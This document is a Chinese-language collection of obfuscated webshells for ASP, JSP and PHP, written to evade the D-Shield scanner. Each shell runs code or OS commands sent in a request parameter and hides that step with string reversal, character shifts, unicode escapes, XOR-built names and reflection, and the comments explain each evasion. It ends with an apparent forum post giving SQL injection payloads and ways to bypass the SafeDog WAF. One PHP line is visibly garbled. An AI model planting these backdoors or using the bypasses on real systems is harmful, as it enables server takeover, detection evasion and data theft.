过d盾小马分析/1

ASP

ASP连接密码均为99999

<%
' Sample 1: a fixed-size array is used as an indirection step.
' a(0) receives the value of request item "99999" (ASP's Request() searches
' the query string, form, cookies and server variables for that name);
' eXecUTe() then evaluates that string as server-side VBScript, so whatever
' code is sent in the request runs on the server.
' The mixed-case spelling of eXecUTe is cosmetic: VBScript keywords are
' case-insensitive, presumably chosen to avoid an exact-token signature.
dim a(5)
a(0)=request("99999")
eXecUTe(a(0))
%>
<%
' Sample 2: the request value is fetched through a function so that
' request() and execute() never appear on the same line.
' b() returns request item "99999". The trailing colon after the signature
' is VBScript's statement separator and has no effect.
Function b():
b = request("99999")
End Function
' f() evaluates the string returned by b() as server-side VBScript.
Function f():
eXecUTe(b())
End Function
' Entry point: a bare call to f() triggers the whole chain.
f()
%>
<%
' Sample 3: execute() is hidden inside a Property Let procedure, so the
' dangerous call is reached by a plain assignment (xxx.www = ...) rather
' than a visible call statement.
Class zzz

private yyy
' Constructor: initialises the private field, which is not read anywhere.
Private Sub Class_Initialize
yyy = ""
End Sub
' Property setter: the assigned value is evaluated as server-side VBScript.
' The parameter name shadows the private field of the same name.
public property let www(yyy)
execute(yyy)
end property

End Class

Set xxx= New zzz
' vvv(2) receives request item "99999"; the assignment to xxx.www invokes
' the Property Let above, which executes it.
dim vvv(7)
vvv(2)=request("99999")
xxx.www= vvv(2)
%>
<%
' Sample 4: the request value is passed through Mid() and a string
' concatenation before execute(), so execute() receives a copy produced by
' string functions rather than the raw request() result.
' x() returns request item "99999".
Function x():
x = request("99999")
End Function
' Mid(s, 1) without a length argument returns all of s.
y = Mid(x(),1)
' Appending "" leaves the string unchanged.
z = y&""
eXecUTe(z)
%>
<%
' Sample 5: like sample 4, but the request value is copied through Left()
' before execute().
' x() returns request item "99999".
Function x():
x = request("99999")
End Function
' Left(s, 99999) returns the first 99999 characters, i.e. the whole value for
' any input shorter than that; the same literal 99999 is also the request
' item name.
y = Left(x(),99999)
eXecUTe(y)
%>

JSP

jsp连接密码均为x

<%-- Sample 1: the class and method names are stored reversed and restored at
     runtime by reverseStr(), so "java.lang.Runtime", "getRuntime" and "exec"
     never appear literally in the source. --%>
<%@ page contentType="text/html;charset=UTF-8"  language="java" %>
<%@ page import="java.lang.reflect.Method"%>
<%-- reverseStr(str): returns str with its characters in reverse order. --%>
<%!public static String reverseStr(String str){String reverse = "";int length = str.length();for (int i = 0; i < length; i++){reverse = str.charAt(i) + reverse;}return reverse;}%>
<%
// Parameter "x" carries the command; nothing runs when it is absent.
String x = request.getParameter("x");
if(x!=null){
// reverseStr("emitnuR.gnal.avaj") == "java.lang.Runtime"
Class rt = Class.forName(reverseStr("emitnuR.gnal.avaj"));
// reverseStr("emitnuRteg") == "getRuntime"
Method gr = rt.getMethod(reverseStr("emitnuRteg"));
// reverseStr("cexe") == "exec"  ->  Runtime.exec(String)
Method ex = rt.getMethod(reverseStr("cexe"), String.class);
// Equivalent to Runtime.getRuntime().exec(x): the request value is run as
// an OS command on the server.
Process e = (Process) ex.invoke(gr.invoke(null), x);
// The process's standard output is copied into the HTTP response.
java.io.InputStream in = e.getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("");
}
%>
<%-- Sample 2: same structure as sample 1, but the names are stored under a
     Caesar shift and restored by plusStr(). --%>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.lang.reflect.Method"%>
<%-- plusStr(str): shifts a..w forward by 3 and wraps x..z to a..c (z-23);
     every other character, including upper case and '.', is copied as is. --%>
<%!public static String plusStr(String str){String plus = "";int length = str.length();for (int i = 0; i < length; i++){char z = str.charAt(i);
if(z>='a'&&z<='w'){z=(char)(z+3);plus=plus+z;}
else if(z>='x'&&z<='z'){z=(char)(z-23);plus=plus+z;}
else{plus=plus+z;}}return plus;}
%>
<%
// Parameter "x" carries the command; nothing runs when it is absent.
String x = request.getParameter("x");
if(x!=null){
// plusStr("gxsx.ixkd.Rrkqfjb") == "java.lang.Runtime"
Class rt = Class.forName(plusStr("gxsx.ixkd.Rrkqfjb"));
// plusStr("dbqRrkqfjb") == "getRuntime"
Method gr = rt.getMethod(plusStr("dbqRrkqfjb"));
// plusStr("bubz") == "exec"  ->  Runtime.exec(String)
Method ex = rt.getMethod(plusStr("bubz"), String.class);
// Equivalent to Runtime.getRuntime().exec(x).
Process e = (Process) ex.invoke(gr.invoke(null),x);
// The process's standard output is copied into the HTTP response.
java.io.InputStream in = e.getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("");
}
%>
<%-- Sample 3: same structure again; names are stored with every character
     code raised by 5 and restored by eStr(), and the scriptlet is collapsed
     onto a few lines. --%>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.lang.reflect.Method"%>
<%-- eStr(str): subtracts 5 from the code of every character. --%>
<%!public static String eStr(String str){String result = "";int length = str.length();for (int i = 0; i < length; i++){char z=str.charAt(i);z=(char)(z-5);result=result+z;}return result;}%>
<%
// eStr("of{f3qfsl3Wzsynrj") == "java.lang.Runtime"; only runs when "x" is present.
if(request.getParameter("x")!=null){Class rt = Class.forName(eStr("of{f3qfsl3Wzsynrj"));
// eStr("j}jh") == "exec", eStr("ljyWzsynrj") == "getRuntime":
// equivalent to Runtime.getRuntime().exec(request.getParameter("x")).
Process e = (Process) rt.getMethod(new String(eStr("j}jh")), String.class).invoke(rt.getMethod(new String(eStr("ljyWzsynrj"))).invoke(null, new Object[]{}), request.getParameter("x") );
// The process's standard output is copied into the HTTP response.
java.io.InputStream in = e.getInputStream();int a = -1;byte[] b = new byte[2048];
out.print("");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("");}
%>
<%-- Sample 4: the whole declaration and scriptlet are written as Java \uXXXX
     escapes. javac translates unicode escapes before tokenizing, so this
     compiles as ordinary Java. Decoded, the declaration defines
     excuteCmd(String c), which runs Runtime.getRuntime().exec(c) and returns
     the process output (or the exception message) as a String; the scriptlet
     calls it with parameter "cftmid" when parameter "peciwid" equals "95277",
     otherwise it prints ":-)". The line break inside the escape at the end of
     the next line looks like a display wrap; in the real file the escape is
     presumably contiguous. --%>
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!\u0070\u0075\u0062\u006c\u0069\u0063\u0020\u0073\u0074\u0061\u0074\u0069\u0063\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0065\u0078\u0063\u0075\u0074\u0065\u0043\u006d\u0064\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0029\u0020\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0020\u006c\u0069\u006e\u0065\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0020\u0070\u0072\u006f\u0020\u003d\u0020\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0063\u0029\u003b\u0042\u0075\u0066\u0066\u0065\u0072\u0065\u0064\u0052\u0065\u0061\u0064\u0065\u0072\u0020\u0062\u0075\u0066\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0042\u0075\u0066\u0066\u0065\u0072\u0065\u0064\u0052\u0065\u0061\u0064\u0065\u0072\u0028\u006e\u0065\u0077\u0020\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0052\u0065\u0061\u0064\u0065\u0072\u0028\u0070\u0072\u006f\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u0029\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0074\u0065\u006d\u0070\u0020\u003d\u0020\u006e\u0075\u006c\u006c\u003b\u0077\u0068\u0069\u006c\u0065\u0020\u0028\u0028\u0074\u0065\u006d\u0070\u0020\u003d\u0020\u0062\u0075\u0066\u002e\u0072\u0065\u0061\u0064\u004c\u0069\u006e\u0065\u0028\u0029\u0029\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u006c\u0069\u006e\u0065\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0074\u0065\u006d\u0070\u002b\u0022\u005c\u006e\u0022\u0029\u003b\u007d\u0062\u0075\u0066\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u002
0\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u006c\u0069\u006e\u0065\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0065\u002e\u0067\u0065\u0074\u004d\u0065\u0073\u0073\u0061\u0067\u0065\u0028\u0029\u0029\u003b\u007d\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u006c\u0069\u006e\u0065\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0029\u003b\u007d%><%\u0069\u0066\u0028\u0022\u0039\u0035\u0032\u0037\u0037\u0022\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0070\u0065\u0063\u0069\u0077\u0069\u0064\u0022\u0029\u0029\u0026\u0026\u0021\u0022\u0022\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0070\u0065\u0063\u0069\u0077\u0069\u0064\u0022\u0029\u0029\u0029\u007b\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u006c\u006e\u0028\u0022\u003c\u0070\u0072\u0065\u003e\u0022\u002b\u0065\u0078\u0063\u0075\u0074\u0065\u0043\u006d\u0064\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0063\u0066\u0074\u006d\u0069\u0064\u0022\u0029\u0029\u002b\u0022\u003c\u002f\u0070\u0072\u0065\u003e\u0022\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u007b\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u006c\u006e\u0028\u0022\u003a\u002d\u0029\u0022\u0029\u003b\u007d%>

使用方法:
?peciwid=95277&cftmid=id

PHP

php连接密码均为1

<?php 
// Sample 1: end() returns the last element of $_REQUEST (GET, POST and
// COOKIE merged in the order set by request_order / variables_order) and
// that value goes straight into eval(). No fixed parameter name appears in
// the source: whichever request variable ends up last is executed.
$a=end($_REQUEST);
eval($a);
?>
<?php
// Sample 2: substr_replace("asse00","rt",4) overwrites the last two
// characters, yielding "assert", so $a($_GET['1']) is assert($_GET['1']).
// Before PHP 8.0 assert() evaluates a string argument as PHP code, so the
// GET parameter "1" is executed. The nested array() and var_dump() only give
// the call an innocuous-looking shape.
$a = substr_replace("asse00","rt",4);
$b=array($array=array(''=>$a($_GET['1'])));
var_dump($b);
?>
<?php
// Sample 3: the payload text lives in the doc comment below and is recovered
// at runtime through reflection, so no $_GET access appears as code.
// NOTE: that doc comment is data here, including its whitespace and line
// endings — substr($comment, 14, 20) depends on its exact bytes.
/**
* assert($_GET[1+0]);
*/
class User { }
// ReflectionClass::getDocComment() returns the /** ... */ block above verbatim.
$user = new ReflectionClass('User');
$comment = $user->getDocComment();
// Offsets 14/20 are presumably meant to cut out the expression inside the
// docblock; the exact slice depends on the original file's line endings and
// indentation — confirm against the sample as actually deployed.
$d = substr($comment , 14 , 20);
// assert() on a string (PHP < 8.0) evaluates it as code.
assert($d);
?>
<?php' v. N& N- O& ]; v9 N! m9 y: {; J
// Sample 4: the function and variable names are assembled from XOR'd bytes
// so that "assert" and "_POST" never appear literally. (The text after the
// opening <?php tag on the line above looks like paste corruption, not code.)
// Each ('%01'^'`') is meant to be a single control byte XOR '`' (0x60):
// 0x01^0x60='a', 0x13^0x60='s', 0x05^0x60='e', 0x12^0x60='r', 0x14^0x60='t'
// -> "assert". As printed here '%01' is a three-character literal, so the
// sample presumably relies on the raw bytes being present in the real file
// — verify against the original.
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
// Same trick: 0x0D^0x5D='P', 0x2F^0x60='O', 0x0E^0x5D='S', 0x09^0x5D='T' -> "_POST".
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
// Variable variable: $___ becomes $_POST.
$___=$$__;
// assert($_POST['pwd']): the bare word pwd is an undefined constant, which
// PHP before 8.0 treats as the string "pwd"; note the inline comment's "_"
// does not match the key actually used.
$_($___[pwd]); // assert($_POST[_]);
?>

过安全狗waf思路:

师傅们,请教下关于mysql 注入bypass的问题。
目标为授权站点,需要拉数据,且数据量多。盲注好慢!!!
环境: linux Apache-Coyote mysql

看界面样式是安全狗,但html里面无safedog字样,应该是安全狗!
post注入点:

a=aaaaaa&post=1 '        报错
a=aaaaaa&post=1 ' order by 1 --+-正常
a=aaaaaa&post=1 ' order by 2 --+-报错
a=aaaaaa&post=1' || char_length(version())>4 --+-常规盲注, true空白,false api接口有返回信息

已通过盲注获取到了基本信息

数据库版本        8.0.22
当前用户 *******(非root)@192.168.1.2

waf过滤了 一些关键词和 关键词组合

1、过滤了select 和from组合以及union select组合,以上组合,只要两个关键词同时出现,就会触发waf,如aasElecTbbgdffromgdgdf 就会触发waf,已fuzz各种空白字符组合(%0a %00 ……)
2、过滤了updatexml floor extractvalue 三个报错函数(不带括号),只要出现关键字就会触发waf,如aaaaupdatexmlfgfdgfd

绕过尝试:

1、post转multipart/form-data 也会触发waf,已经放弃
2、各种空白字符组合 如换行 回车什么的,内联注释同样放弃
3、一次、二次url编码 会触发waf
4、如post内容为空,get也会接受参数,但是waf同样会识别。
5、a=1&updatexml这种不会触发waf,尝试post a=aaaaaa&post=1' || /*&*/updatexml 以及 a=aaaaaa&post=1' || /*&*/char_length(version())>4 ,发现会把&之后的内容当第二个参数,带入不到sql
6、分段传输400
7、最近有遇到一个数字型注入存在安全狗,我是这么绕过的?id=1 /*&id =-1 union select 1,2,3,4%23*/测试的时候,发现/*& */这里面,不管输入什么关键字,都不会拦截,后面的%23是注释掉后面的*/,你可以试试(我在测试的时候,单独的union和单独的select这种,那个站的安全狗是不拦的,组合在一起才会拦截,不知道你是不是这种情况) 但是&后面要是匹配到=号 也会拦截!
8、 换行+空格
9、 mysql的内联注释
10、 分块传输绕